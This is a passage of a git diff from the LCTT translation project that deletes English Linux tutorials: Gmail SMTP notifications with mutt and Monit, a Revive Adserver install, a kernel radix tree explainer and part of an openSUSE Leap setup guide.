-FTP, or File Transfer Protocol, is a standard protocol used to transfer files between users and a server. One of the best lightweight and secure FTP server software packages is Pure-FTPd. It is secure and supports the TLS/SSL encryption mechanism. Pure-FTPd is easy to install and configure: you can manage users with virtual user support, which makes it easy for a sysadmin to manage users on an FTP server with many accounts.
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/install-pure-ftpd-tls-freebsd-10-2/
-
-作者:[Arul][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arulm/
\ No newline at end of file
diff --git a/sources/tech/20151109 How to send email notifications using Gmail SMTP server on Linux.md b/sources/tech/20151109 How to send email notifications using Gmail SMTP server on Linux.md
deleted file mode 100644
index 22e8606c6c..0000000000
--- a/sources/tech/20151109 How to send email notifications using Gmail SMTP server on Linux.md
+++ /dev/null
@@ -1,157 +0,0 @@
-Translating by KnightJoker
-How to send email notifications using Gmail SMTP server on Linux
-================================================================================
-Suppose you want to configure a Linux app to send out email messages from your server or desktop. The email messages can be part of email newsletters, status updates (e.g., [Cachet][1]), monitoring alerts (e.g., [Monit][2]), disk events (e.g., [RAID mdadm][3]), and so on. While you can set up your [own outgoing mail server][4] to deliver messages, you can alternatively rely on a freely available public SMTP server as a maintenance-free option.
-
-One of the most reliable **free SMTP servers** is from Google's Gmail service. All you have to do to send email notifications within your app is to add Gmail's SMTP server address and your credentials to the app, and you are good to go.
-
-One catch with using Gmail's SMTP server is that there are various restrictions in place, mainly to combat spammers and email marketers who often abuse the server. For example, you can send messages to no more than 100 addresses at once, and no more than 500 recipients per day. Also, if you don't want to be flagged as a spammer, you cannot send a large number of undeliverable messages. When any of these limitations is reached, your Gmail account will temporarily be locked out for a day. In short, Gmail's SMTP server is perfectly fine for your personal use, but not meant for commercial bulk emails.
-
-With that being said, let me demonstrate **how to use Gmail's SMTP server in Linux environment**.
-
-### Google Gmail SMTP Server Setting ###
-
-If you want to send emails from your app using Gmail's SMTP server, remember the following details.
-
-- **Outgoing mail server (SMTP server)**: smtp.gmail.com
-- **Use authentication**: yes
-- **Use secure connection**: yes
-- **Username**: your Gmail account ID (e.g., "alice" if your email is alice@gmail.com)
-- **Password**: your Gmail password
-- **Port**: 587
-
-Exact configuration syntax may vary depending on apps. In the rest of this tutorial, I will show you several useful examples of using Gmail SMTP server in Linux.
-
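-Before wiring these settings into an app, you can verify from the shell that the SMTP server is reachable and offers STARTTLS. This check uses the standard openssl client (type QUIT to close the session):
-
-    $ openssl s_client -connect smtp.gmail.com:587 -starttls smtp
-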
-### Send Emails from the Command Line ###
-
-As the first example, let's try the most basic email functionality: send an email from the command line using Gmail SMTP server. For this, I am going to use a command-line email client called mutt.
-
-First, install mutt:
-
-For Debian-based system:
-
- $ sudo apt-get install mutt
-
-For Red Hat based system:
-
- $ sudo yum install mutt
-
-Create a mutt configuration file (~/.muttrc) and specify in the file Gmail SMTP server information as follows. Replace <gmail-id> with your own Gmail ID. Note that this configuration is for sending emails only (not receiving emails).
-
- $ vi ~/.muttrc
-
-----------
-
-    set from = "<gmail-id>@gmail.com"
-    set realname = "Dan Nanni"
-    set smtp_url = "smtp://<gmail-id>@smtp.gmail.com:587/"
-    set smtp_pass = "<gmail-password>"
-
-Now you are ready to send out an email using mutt:
-
- $ echo "This is an email body." | mutt -s "This is an email subject" alice@yahoo.com
-
-To attach a file in an email, use "-a" option:
-
- $ echo "This is an email body." | mutt -s "This is an email subject" alice@yahoo.com -a ~/test_attachment.jpg
-
-![](https://c1.staticflickr.com/1/770/22239850784_5fb0988075_c.jpg)
-
-Using Gmail's SMTP server means that the emails appear as sent from your Gmail account. In other words, a recipient will see your Gmail address as the sender's address. If you want to use your own domain as the email sender, you need to use the Gmail SMTP relay service instead.
-
-### Send Email Notification When a Server is Rebooted ###
-
-If you are running a [virtual private server (VPS)][5] for some critical website, one recommendation is to monitor VPS reboot activities. As a more practical example, let's consider how to set up email notifications for every reboot event on your VPS. Here I assume you are using systemd on your VPS, and show you how to create a custom systemd boot-time service for automatic email notifications.
-
-First create the following script reboot_notify.sh which takes care of email notifications.
-
- $ sudo vi /usr/local/bin/reboot_notify.sh
-
-----------
-
- #!/bin/sh
-
- echo "`hostname` was rebooted on `date`" | mutt -F /etc/muttrc -s "Notification on `hostname`" alice@yahoo.com
-
-----------
-
- $ sudo chmod +x /usr/local/bin/reboot_notify.sh
-
-In the script, I use the "-F" option to specify the location of a system-wide mutt configuration file. So don't forget to create the /etc/muttrc file and populate it with the Gmail SMTP information as described earlier.
-
-Now let's create a custom systemd service as follows.
-
- $ sudo mkdir -p /usr/local/lib/systemd/system
- $ sudo vi /usr/local/lib/systemd/system/reboot-task.service
-
-----------
-
- [Unit]
- Description=Send a notification email when the server gets rebooted
- DefaultDependencies=no
- Before=reboot.target
-
- [Service]
- Type=oneshot
- ExecStart=/usr/local/bin/reboot_notify.sh
-
- [Install]
- WantedBy=reboot.target
-
-Once the service file is created, enable and start the service.
-
- $ sudo systemctl enable reboot-task
- $ sudo systemctl start reboot-task
-
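-Before relying on an actual reboot, you can exercise the mail path by invoking the script directly; it will immediately send the notification email:
-
-    $ sudo /usr/local/bin/reboot_notify.sh
-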
-From now on, you will be receiving a notification email every time the VPS gets rebooted.
-
-![](https://c1.staticflickr.com/1/608/22241452923_2ace9cde2e_c.jpg)
-
-### Send Email Notification from Server Usage Monitoring ###
-
-As a final example, let me present a real-world application called [Monit][6], which is a pretty useful server monitoring application. It comes with comprehensive [VPS][7] monitoring capabilities (e.g., CPU, memory, processes, file system), as well as email notification functions.
-
-If you want to receive email notifications for any event on your VPS (e.g., server overload) generated by Monit, you can add the following SMTP information to Monit configuration file.
-
- set mailserver smtp.gmail.com port 587
-    username "<gmail-id>" password "<gmail-password>"
- using tlsv12
-
- set mail-format {
-    from: <gmail-id>@gmail.com
- subject: $SERVICE $EVENT at $DATE on $HOST
- message: Monit $ACTION $SERVICE $EVENT at $DATE on $HOST : $DESCRIPTION.
-
- Yours sincerely,
- Monit
- }
-
- # the person who will receive notification emails
- set alert alice@yahoo.com
-
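-After editing the Monit control file, it is worth validating the syntax and reloading the daemon (standard monit options):
-
-    $ sudo monit -t
-    $ sudo monit reload
-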
-Here is the example email notification sent by Monit for excessive CPU load.
-
-![](https://c1.staticflickr.com/1/566/22873764251_8fe66bfd16_c.jpg)
-
-### Conclusion ###
-
-As you can imagine, there are many different ways to take advantage of free SMTP servers like Gmail. But once again, remember that the free SMTP server is not meant for commercial usage, only for your own personal projects. If you are using the Gmail SMTP server inside any app, feel free to share your use case.
-
---------------------------------------------------------------------------------
-
-via: http://xmodulo.com/send-email-notifications-gmail-smtp-server-linux.html
-
-作者:[Dan Nanni][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://xmodulo.com/author/nanni
-[1]:http://xmodulo.com/setup-system-status-page.html
-[2]:http://xmodulo.com/server-monitoring-system-monit.html
-[3]:http://xmodulo.com/create-software-raid1-array-mdadm-linux.html
-[4]:http://xmodulo.com/mail-server-ubuntu-debian.html
-[5]:http://xmodulo.com/go/digitalocean
-[6]:http://xmodulo.com/server-monitoring-system-monit.html
-[7]:http://xmodulo.com/go/digitalocean
\ No newline at end of file
diff --git a/sources/tech/20151119 How to Install Revive Adserver on Ubuntu 15.04 or CentOS 7.md b/sources/tech/20151119 How to Install Revive Adserver on Ubuntu 15.04 or CentOS 7.md
deleted file mode 100644
index 3b6277da80..0000000000
--- a/sources/tech/20151119 How to Install Revive Adserver on Ubuntu 15.04 or CentOS 7.md
+++ /dev/null
@@ -1,242 +0,0 @@
-How to Install Revive Adserver on Ubuntu 15.04 / CentOS 7
-================================================================================
-Revive Adserver is a free and open source advertisement management system that enables publishers, ad networks and advertisers to serve ads on websites, apps and videos and to manage campaigns for multiple advertisers with many features. Revive Adserver is licensed under the GNU General Public License and is also known as OpenX Source. It features an integrated banner management interface, URL targeting, geo-targeting and a tracking system for gathering statistics. This application enables website owners to manage banners from in-house advertisement campaigns as well as from paid or third-party sources, such as Google's AdSense. Here, in this tutorial, we'll install Revive Adserver on a machine running Ubuntu 15.04 or CentOS 7.
-
-### 1. Installing LAMP Stack ###
-
-First of all, as Revive Adserver requires a complete LAMP Stack to work, we'll install it. LAMP Stack is the combination of the Apache web server, MySQL/MariaDB database server and PHP modules. To run Revive properly, we'll need to install some PHP modules like apc, zlib, xml, pcre, mysql and mbstring. To set up the LAMP Stack, we'll need to run the following command for the distribution of linux we are currently running.
-
-#### On Ubuntu 15.04 ####
-
- # apt-get install apache2 mariadb-server php5 php5-gd php5-mysql php5-curl php-apc zlibc zlib1g zlib1g-dev libpcre3 libpcre3-dev libapache2-mod-php5 zip
-
-#### On CentOS 7 ####
-
-    # yum install httpd mariadb-server php php-gd php-mysql php-curl php-mbstring php-xml php-apc zlib zlib-devel pcre pcre-devel zip
-
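-On either distribution, we can quickly confirm that the PHP modules Revive needs were actually installed by listing the loaded modules (a simple sanity check):
-
-    # php -m | grep -Ei 'mysql|gd|curl|mbstring|xml'
-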
-### 2. Starting Apache and MariaDB server ###
-
-We’ll now start our newly installed Apache web server and MariaDB database server in our linux machine. To do so, we'll need to execute the following commands.
-
-#### On Ubuntu 15.04 ####
-
-Ubuntu 15.04 ships with systemd as its default init system, so we'll execute the following command to start the apache and mariadb daemons.
-
- # systemctl start apache2 mysql
-
-After they have started, we'll enable them to start automatically at every system boot by running the following command.
-
- # systemctl enable apache2 mysql
-
- Synchronizing state for apache2.service with sysvinit using update-rc.d...
- Executing /usr/sbin/update-rc.d apache2 defaults
- Executing /usr/sbin/update-rc.d apache2 enable
- Synchronizing state for mysql.service with sysvinit using update-rc.d...
- Executing /usr/sbin/update-rc.d mysql defaults
- Executing /usr/sbin/update-rc.d mysql enable
-
-#### On CentOS 7 ####
-
-In CentOS 7 as well, systemd is the default init system, so we'll run the following command to start them.
-
- # systemctl start httpd mariadb
-
-Next, we'll enable them to start automatically at every boot using the following command.
-
- # systemctl enable httpd mariadb
-
- ln -s '/usr/lib/systemd/system/httpd.service' '/etc/systemd/system/multi-user.target.wants/httpd.service'
- ln -s '/usr/lib/systemd/system/mariadb.service' '/etc/systemd/system/multi-user.target.wants/mariadb.service'
-
-### 3. Configuring MariaDB ###
-
-#### On CentOS 7/Ubuntu 15.04 ####
-
-Now, as we are starting MariaDB for the first time and no password has been assigned to it, we'll first need to configure a root password for it. Then we'll create a new database so that it can store data for our Revive Adserver installation.
-
-To configure MariaDB and assign a root password, we’ll need to run the following command.
-
- # mysql_secure_installation
-
-This will ask us to enter the current password for root, but as we haven't set any password before and this is the first time we've installed mariadb, we'll simply press enter and continue. Then we'll be asked whether to set a root password; we'll hit Y and enter a password for the MariaDB root user. Then we'll simply hit enter to accept the default values for the remaining configuration questions.
-
- ….
- so you should just press enter here.
-
- Enter current password for root (enter for none):
- OK, successfully used password, moving on…
-
- Setting the root password ensures that nobody can log into the MariaDB
- root user without the proper authorisation.
-
- Set root password? [Y/n] y
- New password:
- Re-enter new password:
- Password updated successfully!
- Reloading privilege tables..
- … Success!
- …
- installation should now be secure.
- Thanks for using MariaDB!
-
-![Configuring MariaDB](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-mariadb.png)
-
-### 4. Creating new Database ###
-
-After we have assigned the password to the root user of our mariadb server, we'll create a new database for the Revive Adserver application so that it can store its data in the database server. To do so, first we'll need to log in to our MariaDB console by running the following command.
-
- # mysql -u root -p
-
-It will ask us to enter the password of the root user which we just set in the above step. Then we'll be welcomed into the MariaDB console, in which we'll create our new database and database user, assign its password, and grant all privileges to create, remove and edit the tables and data stored in it.
-
- > CREATE DATABASE revivedb;
- > CREATE USER 'reviveuser'@'localhost' IDENTIFIED BY 'Pa$$worD123';
- > GRANT ALL PRIVILEGES ON revivedb.* TO 'reviveuser'@'localhost';
- > FLUSH PRIVILEGES;
- > EXIT;
-
-![Creating Mariadb Revive Database](http://blog.linoxide.com/wp-content/uploads/2015/11/creating-mariadb-revive-database.png)
-
-### 5. Downloading Revive Adserver Package ###
-
-Next, we'll download the latest release of Revive Adserver, i.e. version 3.2.2 at the time of writing this article. First we'll get the download link from the official download page of Revive Adserver, [http://www.revive-adserver.com/download/][1], then we'll download the compressed zip file using the wget command under the /tmp/ directory as shown below.
-
- # cd /tmp/
- # wget http://download.revive-adserver.com/revive-adserver-3.2.2.zip
-
- --2015-11-09 17:03:48-- http://download.revive-adserver.com/revive-adserver-3.2.2.zip
- Resolving download.revive-adserver.com (download.revive-adserver.com)... 54.230.119.219, 54.239.132.177, 54.230.116.214, ...
- Connecting to download.revive-adserver.com (download.revive-adserver.com)|54.230.119.219|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 11663620 (11M) [application/zip]
- Saving to: 'revive-adserver-3.2.2.zip'
- revive-adserver-3.2 100%[=====================>] 11.12M 1.80MB/s in 13s
- 2015-11-09 17:04:02 (906 KB/s) - 'revive-adserver-3.2.2.zip' saved [11663620/11663620]
-
-After the file is downloaded, we'll simply extract its files and directories using unzip command.
-
- # unzip revive-adserver-3.2.2.zip
-
-Then, we'll move the entire Revive directory, including every file, from /tmp to the default webroot of the Apache web server, i.e. the /var/www/html/ directory.
-
- # mv revive-adserver-3.2.2 /var/www/html/reviveads
-
-### 6. Configuring Apache Web Server ###
-
-We'll now configure our Apache server so that Revive will run with a proper configuration. To do so, we'll create a new virtualhost in a new configuration file named reviveads.conf. The directory for this file may differ from one distribution to another; here is how we create it in the following distributions of linux.
-
-#### On Ubuntu 15.04 ####
-
- # touch /etc/apache2/sites-available/reviveads.conf
- # ln -s /etc/apache2/sites-available/reviveads.conf /etc/apache2/sites-enabled/reviveads.conf
- # nano /etc/apache2/sites-available/reviveads.conf
-
-Now, we'll add the following lines of configuration into this file using our favorite text editor.
-
-    <VirtualHost *:80>
-    ServerAdmin info@reviveads.linoxide.com
-    DocumentRoot /var/www/html/reviveads/
-    ServerName reviveads.linoxide.com
-    ServerAlias www.reviveads.linoxide.com
-    <Directory /var/www/html/reviveads/>
-    Options FollowSymLinks
-    AllowOverride All
-    </Directory>
-    ErrorLog /var/log/apache2/reviveads.linoxide.com-error_log
-    CustomLog /var/log/apache2/reviveads.linoxide.com-access_log common
-    </VirtualHost>
-
-![Configuring Apache2 Ubuntu](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-apache2-ubuntu.png)
-
-Once done, we'll save the file and exit our text editor. Then, we'll restart our Apache web server.
-
- # systemctl restart apache2
-
-#### On CentOS 7 ####
-
-In CentOS, we'll directly create the file reviveads.conf under the /etc/httpd/conf.d/ directory using our favorite text editor.
-
- # nano /etc/httpd/conf.d/reviveads.conf
-
-Then, we'll add the following lines of configuration into the file.
-
-    <VirtualHost *:80>
-    ServerAdmin info@reviveads.linoxide.com
-    DocumentRoot /var/www/html/reviveads/
-    ServerName reviveads.linoxide.com
-    ServerAlias www.reviveads.linoxide.com
-    <Directory /var/www/html/reviveads/>
-    Options FollowSymLinks
-    AllowOverride All
-    </Directory>
-    ErrorLog /var/log/httpd/reviveads.linoxide.com-error_log
-    CustomLog /var/log/httpd/reviveads.linoxide.com-access_log common
-    </VirtualHost>
-
-![Configuring httpd Centos](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-httpd-centos.png)
-
-Once done, we'll simply save the file and exit the editor. And then we'll restart our apache web server.
-
- # systemctl restart httpd
-
-### 7. Fixing Permissions and Ownership ###
-
-Now, we'll fix the file permissions and ownership of the installation path. We'll set the ownership of the installation directory to the Apache process owner so that the apache web server has full access to the files and directories to edit, create and delete them.
-
-#### On Ubuntu 15.04 ####
-
- # chown www-data: -R /var/www/html/reviveads
-
-#### On CentOS 7 ####
-
- # chown apache: -R /var/www/html/reviveads
-
-### 8. Allowing Firewall ###
-
-Now, we'll configure our firewall to allow port 80 (http) so that the apache web server running Revive Adserver will be accessible from other machines in the network across the default http port, i.e. 80.
-
-#### On Ubuntu 15.04/CentOS 7 ####
-
-As CentOS 7 and Ubuntu 15.04 both have systemd installed by default, both run firewalld as the firewall program. In order to open port 80 (the http service) in firewalld, we'll need to execute the following commands.
-
- # firewall-cmd --permanent --add-service=http
-
- success
-
- # firewall-cmd --reload
-
- success
-
-### 9. Web Installation ###
-
-Finally, after everything is done as expected, we'll be able to access the web interface of the application using a web browser. We can proceed with the web installation by pointing the web browser to the web server running on our linux machine. To do so, we'll need to point our web browser to http://ip-address/ or http://domain.com, as assigned to our linux machine. Here, in this tutorial, we'll point our browser to http://reviveads.linoxide.com/ .
-
-Here, we'll see the welcome page of the Revive Adserver installation with the GNU General Public License V2, as Revive Adserver is released under this license. Then, we'll simply click on the "I agree" button in order to continue the installation.
-
-On the next page, we'll need to enter the required database information in order to connect Revive Adserver to the MariaDB database server. Here, we'll need to enter the database name, user and password that we set in the step above. In this tutorial, we entered the database name, user and password as revivedb, reviveuser and Pa$$worD123 respectively, then we set the hostname to localhost and continued further.
-
-![Configuring Revive Adserver](http://blog.linoxide.com/wp-content/uploads/2015/11/configuring-revive-adserver.png)
-
-We'll now enter the required information such as administration username, password and email address so that we can use this information to log in to the dashboard of our Adserver. Once done, we'll head to the Finish page, on which we'll see that we have successfully installed Revive Adserver on our server.
-
-Next, we'll be redirected to the Advertisers page, where we'll add new advertisers and manage them. Then we'll be able to navigate to our dashboard, add new users to the adserver, and add new campaigns for our advertisers, banners, websites, video ads and everything else it comes with.
-
-To enable more configuration options and access the administrative settings, we can switch our dashboard user to the Administrator account. This will add new administrative menus to the dashboard, like Plugins and Configuration, through which we can add and manage plugins and configure many features and elements of Revive Adserver.
-
-### Conclusion ###
-
-In this article, we learned what Revive Adserver is and how to set it up on a linux machine running the Ubuntu 15.04 or CentOS 7 distributions. Though Revive Adserver's initial source code was bought from OpenX, currently the code bases for OpenX Enterprise and Revive Adserver are completely separate. To extend it with more features, we can install additional plugins, which we can also find at [http://www.adserverplugins.com/][2]. Really, this piece of software has changed the way ads are managed for websites, apps and videos, making it very easy and efficient. If you have any questions, suggestions or feedback, please write them in the comment box below so that we can improve or update our content. Thank you!
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/install-revive-adserver-ubuntu-15-04-centos-7/
-
-作者:[Arun Pyasi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:http://www.revive-adserver.com/download/
-[2]:http://www.adserverplugins.com/
\ No newline at end of file
diff --git a/sources/tech/20151123 Data Structures in the Linux Kernel.md b/sources/tech/20151123 Data Structures in the Linux Kernel.md
deleted file mode 100644
index d344eacd97..0000000000
--- a/sources/tech/20151123 Data Structures in the Linux Kernel.md
+++ /dev/null
@@ -1,203 +0,0 @@
-Translating by DongShuaike
-
-Data Structures in the Linux Kernel
-================================================================================
-
-Radix tree
---------------------------------------------------------------------------------
-
-As you already know, the linux kernel provides many different libraries and functions which implement different data structures and algorithms. In this part we will consider one of these data structures - the [Radix tree](http://en.wikipedia.org/wiki/Radix_tree). There are two files which are related to the `radix tree` implementation and API in the linux kernel:
-
-* [include/linux/radix-tree.h](https://github.com/torvalds/linux/blob/master/include/linux/radix-tree.h)
-* [lib/radix-tree.c](https://github.com/torvalds/linux/blob/master/lib/radix-tree.c)
-
-Let's talk about what a `radix tree` is. A radix tree is a `compressed trie`, where a [trie](http://en.wikipedia.org/wiki/Trie) is a data structure which implements an interface of an associative array and allows values to be stored as `key-value` pairs. The keys are usually strings, but any data type can be used. A trie is different from an `n-tree` because of its nodes. Nodes of a trie do not store keys; instead, a node of a trie stores single character labels. The key which is related to a given node is derived by traversing from the root of the tree to this node. For example:
-
-
-```
- +-----------+
- | |
- | " " |
- | |
- +------+-----------+------+
- | |
- | |
- +----v------+ +-----v-----+
- | | | |
- | g | | c |
- | | | |
- +-----------+ +-----------+
- | |
- | |
- +----v------+ +-----v-----+
- | | | |
- | o | | a |
- | | | |
- +-----------+ +-----------+
- |
- |
- +-----v-----+
- | |
- | t |
- | |
- +-----------+
-```
-
-So in this example, we can see the `trie` with the keys `go` and `cat`. The compressed trie or `radix tree` differs from the `trie` in that all intermediate nodes which have only one child are removed.
-
-The radix tree in the linux kernel is the data structure which maps values to integer keys. It is represented by the following structures from the file [include/linux/radix-tree.h](https://github.com/torvalds/linux/blob/master/include/linux/radix-tree.h):
-
-```C
-struct radix_tree_root {
- unsigned int height;
- gfp_t gfp_mask;
- struct radix_tree_node __rcu *rnode;
-};
-```
-
-This structure presents the root of a radix tree and contains three fields:
-
-* `height` - height of the tree;
-* `gfp_mask` - tells how memory allocations will be performed;
-* `rnode` - pointer to the child node.
-
-The first field we will discuss is `gfp_mask`:
-
-Low-level kernel memory allocation functions take a set of flags as `gfp_mask`, which describes how that allocation is to be performed. These `GFP_` flags which control the allocation process can have the following values:
-
-* `GFP_NOIO` - can sleep and wait for memory;
-* `__GFP_HIGHMEM` - high memory can be used;
-* `GFP_ATOMIC` - allocation process is high-priority and can't sleep;
-
-etc.
-
-The next field is `rnode`:
-
-```C
-struct radix_tree_node {
- unsigned int path;
- unsigned int count;
- union {
- struct {
- struct radix_tree_node *parent;
- void *private_data;
- };
- struct rcu_head rcu_head;
- };
- /* For tree user */
- struct list_head private_list;
- void __rcu *slots[RADIX_TREE_MAP_SIZE];
- unsigned long tags[RADIX_TREE_MAX_TAGS][RADIX_TREE_TAG_LONGS];
-};
-```
-
-This structure contains information about the offset in the parent and the height from the bottom, the count of child nodes, and fields for accessing and freeing a node. These fields are described below:
-
-* `path` - offset in parent & height from the bottom;
-* `count` - count of the child nodes;
-* `parent` - pointer to the parent node;
-* `private_data` - used by the user of a tree;
-* `rcu_head` - used for freeing a node;
-* `private_list` - used by the user of a tree;
-
-The last two fields of the `radix_tree_node` - `tags` and `slots` - are important and interesting. Every node can contain a set of slots which store pointers to the data. Empty slots in the linux kernel radix tree implementation store `NULL`. Radix trees in the linux kernel also support tags, which are associated with the `tags` field in the `radix_tree_node` structure. Tags allow individual bits to be set on records which are stored in the radix tree.
-
-Now that we know about the radix tree structure, it is time to look at its API.
-
-Linux kernel radix tree API
----------------------------------------------------------------------------------
-
-We start with the data structure initialization. There are two ways to initialize a new radix tree. The first is to use the `RADIX_TREE` macro:
-
-```C
-RADIX_TREE(name, gfp_mask);
-```
-
-As you can see, we pass the `name` parameter, so with the `RADIX_TREE` macro we can define and initialize a radix tree with the given name. The implementation of `RADIX_TREE` is simple:
-
-```C
-#define RADIX_TREE(name, mask) \
- struct radix_tree_root name = RADIX_TREE_INIT(mask)
-
-#define RADIX_TREE_INIT(mask) { \
- .height = 0, \
- .gfp_mask = (mask), \
- .rnode = NULL, \
-}
-```
-
-The `RADIX_TREE` macro defines an instance of the `radix_tree_root` structure with the given name and calls the `RADIX_TREE_INIT` macro with the given mask. The `RADIX_TREE_INIT` macro just initializes the `radix_tree_root` structure with the default values and the given mask.
-
-The second way is to define the `radix_tree_root` structure by hand and pass it with a mask to the `INIT_RADIX_TREE` macro:
-
-```C
-struct radix_tree_root my_radix_tree;
-INIT_RADIX_TREE(&my_radix_tree, gfp_mask_for_my_radix_tree);
-```
-
-where:
-
-```C
-#define INIT_RADIX_TREE(root, mask) \
-do { \
- (root)->height = 0; \
- (root)->gfp_mask = (mask); \
- (root)->rnode = NULL; \
-} while (0)
-```
-
-performs the same initialization with default values as the `RADIX_TREE_INIT` macro does.
-
-Next are two functions for inserting records into and deleting them from a radix tree:
-
-* `radix_tree_insert`;
-* `radix_tree_delete`;
-
-The first `radix_tree_insert` function takes three parameters:
-
-* root of a radix tree;
-* index key;
-* data to insert;
-
-The `radix_tree_delete` function takes the same set of parameters as the `radix_tree_insert`, but without data.
-
-Search in a radix tree is implemented in the following ways:
-
-* `radix_tree_lookup`;
-* `radix_tree_gang_lookup`;
-* `radix_tree_lookup_slot`.
-
-The first `radix_tree_lookup` function takes two parameters:
-
-* root of a radix tree;
-* index key;
-
-This function tries to find the given key in the tree and returns the record associated with this key. The second function, `radix_tree_gang_lookup`, has the following signature:
-
-```C
-unsigned int radix_tree_gang_lookup(struct radix_tree_root *root,
- void **results,
- unsigned long first_index,
- unsigned int max_items);
-```
-
-and returns the number of records, sorted by key, starting from the first index. The number of returned records will not be greater than the `max_items` value.
-
-And the last function, `radix_tree_lookup_slot`, returns the slot which contains the data.
-
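-To see how these pieces fit together, here is a small usage sketch (kernel-side code; it assumes a context where sleeping allocations are allowed, and error handling is kept to a minimum):
-
-```C
-#include <linux/radix-tree.h>
-#include <linux/slab.h>
-#include <linux/kernel.h>
-
-/* Define and initialize a radix tree whose nodes may be allocated with GFP_KERNEL. */
-static RADIX_TREE(my_tree, GFP_KERNEL);
-
-static int example(void)
-{
-	int *item = kmalloc(sizeof(*item), GFP_KERNEL);
-	void *found;
-
-	if (!item)
-		return -ENOMEM;
-	*item = 42;
-
-	/* Store the pointer under the integer key 100. */
-	if (radix_tree_insert(&my_tree, 100, item)) {
-		kfree(item);
-		return -ENOMEM;
-	}
-
-	/* Look the record up again by the same key. */
-	found = radix_tree_lookup(&my_tree, 100);
-	if (found)
-		pr_info("key 100 holds %d\n", *(int *)found);
-
-	/* radix_tree_delete returns the removed item, so we can free it. */
-	found = radix_tree_delete(&my_tree, 100);
-	kfree(found);
-
-	return 0;
-}
-```
-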
-Links
----------------------------------------------------------------------------------
-
-* [Radix tree](http://en.wikipedia.org/wiki/Radix_tree)
-* [Trie](http://en.wikipedia.org/wiki/Trie)
-
---------------------------------------------------------------------------------
-
-via: https://github.com/0xAX/linux-insides/edit/master/DataStructures/radix-tree.md
-
-作者:[0xAX]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
diff --git a/sources/tech/20151202 8 things to do after installing openSUSE Leap 42.1.md b/sources/tech/20151202 8 things to do after installing openSUSE Leap 42.1.md
deleted file mode 100644
index 183d39252f..0000000000
--- a/sources/tech/20151202 8 things to do after installing openSUSE Leap 42.1.md
+++ /dev/null
@@ -1,109 +0,0 @@
-#name1e5s Translating
-8 things to do after installing openSUSE Leap 42.1
-================================================================================
-![Credit: Metropolitan Transportation/Flickr](http://images.techhive.com/images/article/2015/11/things-to-do-100626947-primary.idge.jpg)
-Credit: [Metropolitan Transportation/Flickr][1]
-
-> You've installed openSUSE on your PC. Here's what to do next.
-
-[openSUSE Leap is indeed a huge leap][2], allowing users to run a distro that has the same DNA of SUSE Linux Enterprise. Like any other operating system, some work is needed to get it set up for optimal use.
-
-Following are some of the things that I did after installing openSUSE Leap on my PC (these are not applicable for server installations). None of them are mandatory, and you may be fine with the basic install. But if you need more out of your openSUSE Leap, follow me.
-
-### 1. Adding Packman repository ###
-
-Due to software patents and licences, openSUSE, like many Linux distributions, doesn't offer many applications, codecs, and drivers through official repositories (repos). Instead, these are made available through 3rd party or community repos. The first and most important repository is 'Packman'. Since these repos are not enabled by default, we have to add them. You can do so either using YaST (one of the gems of openSUSE) or by command line (instructions below).
-
-![o42 yast repo](http://images.techhive.com/images/article/2015/11/o42-yast-repo-100626952-large970.idge.png)
-Adding Packman repositories.
-
-Using YaST, go to the Software Repositories section. Click on the 'Add' button and select 'Community Repositories.' Click 'Next.' And once the repos are loaded, select the Packman Repository. Click 'OK,' then import the trusted GnuPG key by clicking on the 'Trust' button.
-
-Or, using the terminal you can add and enable the Packman repo using the following command:
-
-    zypper ar -f -n packman http://ftp.gwdg.de/pub/linux/misc/packman/suse/openSUSE_Leap_42.1/ packman
-
-Once the repo is added, you have access to many more packages. To install any application or package, open YaST Software Manager, search for the package and install it.
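-
-If you prefer the command line, a roughly equivalent zypper workflow looks like this (the package name vlc is only an example):
-
-    sudo zypper refresh
-    zypper search vlc
-    sudo zypper install vlc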
-
-### 2. Install VLC ###
-
-VLC is the Swiss Army knife of media players and can play virtually any media file. You can install VLC from YaST Software Manager or from software.opensuse.org. You will need to install two packages: vlc and vlc-codecs.
-
-If using terminal, run the following command:
-
- sudo zypper install vlc vlc-codecs
-
-### 3. Install Handbrake ###
-
-If you need to transcode or convert your video files from one format to another, [Handbrake is the tool for you][3]. Handbrake is available through the repositories we enabled, so just search for it in YaST and install it.
-
-If you are using the terminal, run the following command:
-
- sudo zypper install handbrake-cli handbrake-gtk
-
-(Pro tip: VLC can also transcode audio and video files.)
-
-### 4. Install Chrome ###
-
-OpenSUSE comes with Firefox as the default browser. But since Firefox isn't capable of playing restricted media such as Netflix, I recommend installing Chrome. This takes some extra work. First you need to import the trusted key from Google. Open the terminal app and run the 'wget' command to download the key:
-
- wget https://dl.google.com/linux/linux_signing_key.pub
-
-Then import the key:
-
- sudo rpm --import linux_signing_key.pub
-
-Now head over to the [Google Chrome website][4] and download the 64 bit .rpm file. Once downloaded run the following command to install the browser:
-
- sudo zypper install /PATH_OF_GOOGLE_CHROME.rpm
-
-### 5. Install Nvidia drivers ###
-
-OpenSUSE Leap will work out of the box even if you have Nvidia or ATI graphics cards. However, if you do need the proprietary drivers for gaming or any other purpose, you can install such drivers, but some extra work is needed.
-
-First you need to add the Nvidia repositories; it's the same procedure we used to add Packman repositories using YaST. The only difference is that you will choose Nvidia from the Community Repositories section. Once it's added, go to **Software Management > Extras** and select 'Extras/Install All Matching Recommended Packages'.
-
